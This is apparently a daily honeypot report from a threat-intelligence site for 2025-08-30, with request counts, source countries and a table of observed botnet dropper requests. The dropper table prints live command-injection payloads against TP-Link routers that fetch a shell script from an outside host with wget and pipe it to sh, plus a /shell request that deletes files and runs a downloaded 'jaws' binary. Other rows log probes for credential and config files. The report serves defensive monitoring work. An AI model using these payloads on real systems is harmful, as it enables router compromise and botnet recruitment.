Skip to main content
  1. Daily-Posts/

Report: 2025-08-30

·331 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-08-30
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 11 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 7 new requests that have never been observed before (these were added to the monitored request database.).

A total of 624 requests were recorded during the day, originating from 11 different countries, with a peak of 263 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
GBGermany
DEGermany
USGermany
USGermany
SGGermany
USGermany
HKGermany
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
119.206.51.78GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
218.158.250.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1
58.40.8.206GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1
68.113.110.78GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
8.222.194.137GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
4.38.142.6GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
58.40.8.206GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
121.167.125.180GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
103.130.82.30GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1
220.124.188.145GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1
156.244.27.246GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
362POST /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript HTTP/1.1
1061GET /param.ini HTTP/1.1
1091GET /.env.sh HTTP/1.1
1321GET /XNMj HTTP/1.1
1331GET /6Ewj HTTP/1.1
1531GET /database/accounts/accountManagement.php HTTP/1.0
2641GET /index.php?-s HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0263GB
1144US
238FR
327SC
426NL
524DE
619RU
711AU
811CH
97CN
106KR
116TW
126CA
135ZA
145UA
154JP
164HK
174BG
184SG
192ID
202BE
211ES
221MC
231BR
241PT
251TH
261BD

Related

Report: 2025-08-29
·440 words
Repport Daily
Report: 2025-08-28
·329 words
Repport Daily
Report: 2025-08-27
·336 words
Repport Daily